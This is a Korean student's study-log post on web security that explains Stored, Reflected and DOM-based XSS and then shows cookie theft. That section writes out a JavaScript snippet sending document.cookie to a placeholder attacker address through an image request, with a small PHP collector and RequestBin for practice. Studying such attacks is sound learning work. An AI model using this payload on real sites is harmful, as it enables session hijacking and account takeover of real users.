[기록일지] 📚 10주차 (XSS - DOM Based/Cookie 탈취)

앞서 정리한 XSS

XSS는 클라이언트 측 스크립트 삽입 공격으로서 웹 브라우저에서 실행 가능한 스크립트인 Javascript가 대표적으로 공격에 이용된다.

실행위치는 피해자(이용자)의 웹 브라우저이다.

웹 브라우저는 실행 시에 자바스크립트(Javascript) 태그(Tag)를 찾아서 코드를 실행한다.

<script>badCode</script>

악성 코드(badCode)가 실행되는 것을 증명하기 위해서 alert(1)과 같은 POC를 이용하여 실행된다는 사실을 보여준다.

 

Stored XSS

서버에 스크립트를 저장하고 해당 위치에 접근하는 경우 스크립트가 실행되어 피해를 입는다.

삽입된 스크립트가 출력되는 페이지에 피해자가 직접 접근

ex) 게시판에 악성 스크립트를 삽입해두고, 글 열람시에 스크립트가 실행

Reflected XSS

서버에서 반사되는 특징을 이용한다.

서버로 파라미터에다가 어떤 데이터를 보낸 경우, 해당 파라미터/데이터가 그대로 반사되어 노출되고 있다면 이용 가능하다.

해당 취약점은 해당 클라이언트에서만 발생되기 때문에 링크에 담아야한다.

그래서 POST로는 불가능하고 GET을 이용하여 파라미터가 담겨가야한다.

(공격자는 피해자에게 URL을 전달하고, 피해자는 해당 URL을 클릭해서 공격을 당한다.)

시나리오

이것을 공격에 어떻게 활용하지? 에 대한 생각을 해보면서 시나리오를 생각해보고 실시 해보자.

취약점을 찾을 때, alert를 띄우고 생각을 멈추는 것이 아니고, 이 취약점으로 내가 뭘 할 수 있는지에 대하여 생각해보는 것이 중요하다.

내가 공격자이자 피해자인 역할극을 해보는 것이다.

(해당 스크립트를 피해자 컴퓨터에서 실행시킬 수 있는가가 중요하다는 것을 생각해야 한다.)

---

DOM Based XSS

DOM이란 문서 객체 모델(Document Object Model)의 약어로서 페이지(= HTML 문서)의 전체적인 구조를 Object로 나타낸 구조이다.

페이지는 <html> 태그 내부에 <head>, <body> 태그(tag) 내부에 수많은 태그들이 쌓여있는 구조로 이루어진다.

위와 같이 문서를 구성하는 객체(Object) 노드(Node)로 구성된 트리 구조의 모델을 DOM이라고 하는 것이다.

(추후에 좀 더 자세히 정리하도록 하고 여기서는 이런 구조의 형태를 하고 있고 이를 이용할 수 있다고만 생각하면 될 것같다.)

앞서서 정리한 Reflected XSS와 비슷하게 입력값이 화면상에 노출되었지만 반사되어 응답에 나오는 것은 아닌 형태를 띄고 있다면 브라우저에서 조립하여 나온 것으로 Reflected와는 다르다.

위에서 정리했듯 DOM은 쉽게 말해 HTML 이라고 생각하면 되는데, javascript로 tag를 만들어서 사용했듯이 javascript로 javascript도 만들어 낼 수 있다. 브라우저에서 조립되어 script를 실행한다는 것으로 자주 사용되는 자바스크립트 방식이다. document 객체에 태그를 작성하여 스크립트를 만들 수 있기 때문에 DOM based 라고 한다.

document.write = " "
innerHTML

document.write() 함수는 인자로 주어진 문자열을 화면에 그대로 출력하는 기능을 수행하게 되는데, 이 말은 HTML tag, JavaScript를 작성하여 넣어주는 경우 태그(Tag)와 스크립트(script)를 실행할 수 있다는 것이다.

이처럼 HTML 객체를 제어하는 javascript가 작성되어있는 경우에는 이를 이용하여 그 안에 스크립트를 삽입할 수 있게 되고 이를 활용한 공격 방법을 DOM Based XSS라고 한다.

파라미터(Params)에 스크립트(script)를 넣어 줌으로써  파라미터 내부의 스크립트가 서버로 전달되었다가 서버에서 다시 브라우저로 돌아오는 과정에서 스크립트가 조립되어 페이지 내부로 들어가게 되는 것이다.

DOM based XSS의 경우에 공격 스크립트가 실행되게 되더라도 응답에서는 해당 스크립트의 내용이 확인되지 않는다. document.write() 함수로 출력하는 과정에서 조립되어 페이지의 내용에 들어가게 되기 때문이다.

---

XSS 찾기 TIP

Stored는 저장하는 곳을 잘보면 되고

Reflected는 Burp Suite에서 반사되는 것을 잘 확인하면 되고

DOM Based는 HTML/Javascript Code를 잘 봐야한다.!!

(해당 코드를 분석하여 스크립트를 넣어야하기 때문으로 어떻게 보면 Reflected와 비슷하지만 다르다는 것을 인지해야한다.)

Reflected로 의심되는 곳(입력값이 노출되고 있는데)에서 파라미터 값을 넣었는데 값이 바로 안나온다면(반사되지 않는 다면) DOM을 의심해볼 수 있다.

DOM의 경우 눈에 잘 보이지 않게 만들어 질 수 있기 때문에, 자세히 찾아봐야한다.

눈에 잘 띄지 않아 발견하는 것이 어렵기 때문에 오히려 많이 남아있을 수 있기 때문에 생각보다 많이 찾아볼 수 있는 취약점이다.

Stored XSS - 서버에 저장
Reflected XSS - 브라우저에 반사
DOM Based XSS - 피해자 브라우저에서 조립

---

Cookie 탈취

XSS는 임의의 스크립트(script)를 삽입하는 공격이다.

그러므로 Javascript를 얼마나 잘 쓰냐에 따라 공격의 수준이 천지 차이가 난다는 사실을 인지해야한다.

(javascript에 대한 공부를 좀 더 해야겠다.)

우선 이번에는 다양한 형태의 공격 스크립트 중에 쿠키(Cookie) 탈취에 대하여 알아볼 것이다.

쿠키 탈취의 경우 (세션 / 세션 ID / 쿠키)와 연관지어 면접의 단골 질문이라고 한다.

세션 ID가 쿠키에 저장된다는 사실을 잊어서는 안된다. 그래서 우리는 세션 ID를 찰취하여 해당 유저인 척할 수 있다는 것이다.

javascript로 쿠키 값에 접근하여 가져오는 방법은 다음과 같다.

var cookieData = document.cookie; // 쿠키에 접근
(전달할 필요 없이 받기만 하면되므로)
// Web Request [GET]
var i = new Image(); // 이미지 태그를 생성한것
<img> i.src = "http://공격자 주소/?cookie=" + "Secret_data";

img 태그를 이용하게 되면, img를 가져오기 위해서 img 주소에 요청을 보내게 된다. 이를 이용하여 쿠키값을 포함하여 공격자의 주소를 img 주소로서 입력하게 되면 쿠키 값을 탈취할 수 있게 되는 것이다.

<img src = "http:// ~~~ 주소/";>
(해당 주소로 get 방식으로 웹 요청을 하나 보낸다.)
http:// ~~~ 주소/?cookie=Secret_data

GET /?cookie=Secret_data
HOST : http:// ~~~ 주소/

그러므로 쿠키 데이터를 Secret data에 담아주는 방식으로 그림을 요청할 수 밖에 없는 img 태그를 활용하는 것이다.

src는 이미지 파일의 속성값에 접근하는 것이기 때문에 속성값에 주소를 넣어주는 것이다.

이 주소로 웹 요청을 하게되고 지정된 소스를 실행하게 한다. 해당 주소에 접근하여 이미지를 가져와야한다고 인식하지만, 실제로는 공격자의 컴퓨터(서버)에 들어가는(접속하는) 것과 같다.

결국 해당 주소를 클릭한 것과 같은 효과가 난다는 것이다.

이때 쿠키 데이터를 url에 넣어서 보냄으로서 쿠키를 탈취할 수 있게 되는 것이다.

<?
php $cookie = $_GET['cookie'];
echo $cookie;
?>

 

공격자 서버의 경우

VPS(가상 사설 서버 Virtual Private Server)를 직접 구축해도 되지만, 돈을 내고 사야하기 때문에 나중에는 필요로할지 모르지만, 우선 지금 연습할 때에는 request bin을 이용하도록 한다. (어떤 요청이 오는지만 볼 수 있지만 연습용으로는 충분하다.)

| https://public.requestbin.com/r/

RequestBin.com — A modern request bin to collect, inspect and debug HTTP requests and webhooks

---

질문 환영, 수정 및 보완에 대한 지적 환영